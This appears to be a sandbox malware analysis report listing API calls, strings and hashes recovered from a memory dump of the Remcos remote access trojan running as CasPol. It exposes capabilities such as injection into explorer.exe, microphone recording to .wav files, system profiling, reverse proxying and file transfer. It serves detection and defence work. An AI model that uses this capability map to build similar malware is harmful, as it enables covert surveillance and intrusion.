                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess
                                                                                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                            • API String ID: 2050909247-4145329354
                                                                                                            • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                            • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                            • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                            • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                            Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                            • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                            • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                            • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                            Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00446DDF
                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 00446DEB
                                                                                                            • _free.LIBCMT ref: 00446DF6
                                                                                                            • _free.LIBCMT ref: 00446E01
                                                                                                            • _free.LIBCMT ref: 00446E0C
                                                                                                            • _free.LIBCMT ref: 00446E17
                                                                                                            • _free.LIBCMT ref: 00446E22
                                                                                                            • _free.LIBCMT ref: 00446E2D
                                                                                                            • _free.LIBCMT ref: 00446E38
                                                                                                            • _free.LIBCMT ref: 00446E46
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                            • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                            • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                            Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Eventinet_ntoa
                                                                                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                            • API String ID: 3578746661-4192532303
                                                                                                            • Opcode ID: d5e75b1e175cc3013bdfcc18363249725d57978ff08be7b442eff6e5afbf081f
                                                                                                            • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                            • Opcode Fuzzy Hash: d5e75b1e175cc3013bdfcc18363249725d57978ff08be7b442eff6e5afbf081f
                                                                                                            • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                            Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DecodePointer
                                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                            • API String ID: 3527080286-3064271455
                                                                                                            • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                            • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                            • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                            • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                            Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                            • API String ID: 1462127192-2001430897
                                                                                                            • Opcode ID: c9e55723ecb2ee04230f435addb8f16ed6a8a05fe378bed3b576d9dff6fd58f4
                                                                                                            • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                            • Opcode Fuzzy Hash: c9e55723ecb2ee04230f435addb8f16ed6a8a05fe378bed3b576d9dff6fd58f4
                                                                                                            • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                            Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _strftime.LIBCMT ref: 00401AD3
                                                                                                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                            • API String ID: 3809562944-3643129801
                                                                                                            • Opcode ID: a0d4b68123ccb8690edebec149ad94aabf9f76f5131ed63dacbc39586bcb4aec
                                                                                                            • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                            • Opcode Fuzzy Hash: a0d4b68123ccb8690edebec149ad94aabf9f76f5131ed63dacbc39586bcb4aec
                                                                                                            • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                            Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                            • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                            • waveInStart.WINMM ref: 00401A81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                            • String ID: XCG$`=G$x=G
                                                                                                            • API String ID: 1356121797-903574159
                                                                                                            • Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                            • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                            • Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                            • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                            Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                              • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                              • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                              • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                            • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                            • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                            • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                            • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                            • String ID: Remcos
                                                                                                            • API String ID: 1970332568-165870891
                                                                                                            • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                            • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                            • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                            • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                            Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c66e7b394ba3cedc2256576aca990ac76a61b28af5954af531c93a6943a32a1c
                                                                                                            • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                            • Opcode Fuzzy Hash: c66e7b394ba3cedc2256576aca990ac76a61b28af5954af531c93a6943a32a1c
                                                                                                            • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                            Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                                            • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                                            • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                                            • __freea.LIBCMT ref: 00452DAA
                                                                                                            • __freea.LIBCMT ref: 00452DB6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 201697637-0
                                                                                                            • Opcode ID: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                                                                                                            • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                            • Opcode Fuzzy Hash: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                                                                                                            • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                            Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                            • _free.LIBCMT ref: 00444714
                                                                                                            • _free.LIBCMT ref: 0044472D
                                                                                                            • _free.LIBCMT ref: 0044475F
                                                                                                            • _free.LIBCMT ref: 00444768
                                                                                                            • _free.LIBCMT ref: 00444774
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                            • String ID: C
                                                                                                            • API String ID: 1679612858-1037565863
                                                                                                            • Opcode ID: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
                                                                                                            • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                            • Opcode Fuzzy Hash: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
                                                                                                            • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                            Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: tcp$udp
                                                                                                            • API String ID: 0-3725065008
                                                                                                            • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                            • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                            • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                            • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                            Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ExitThread.KERNEL32 ref: 004017F4
                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                            • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                            • String ID: T=G$p[G$>G$>G
                                                                                                            • API String ID: 1596592924-2461731529
                                                                                                            • Opcode ID: b033b66669596b249d1ce25b62a4281e1d13c05af68800beb23af724c3c7b6f6
                                                                                                            • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                            • Opcode Fuzzy Hash: b033b66669596b249d1ce25b62a4281e1d13c05af68800beb23af724c3c7b6f6
                                                                                                            • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                            Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                              • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                              • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                            • String ID: .part
                                                                                                            • API String ID: 1303771098-3499674018
                                                                                                            • Opcode ID: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                            • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                            • Opcode Fuzzy Hash: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                            • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                            Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                              • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                              • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                            • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                            • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                            • API String ID: 37874593-703403762
                                                                                                            • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                            • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                            • Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                            • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                            Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                                            • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                                            • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                            • __freea.LIBCMT ref: 00449B37
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • __freea.LIBCMT ref: 00449B40
                                                                                                            • __freea.LIBCMT ref: 00449B65
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3864826663-0
                                                                                                            • Opcode ID: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                                                                                                            • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                            • Opcode Fuzzy Hash: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                                                                                                            • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                            Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
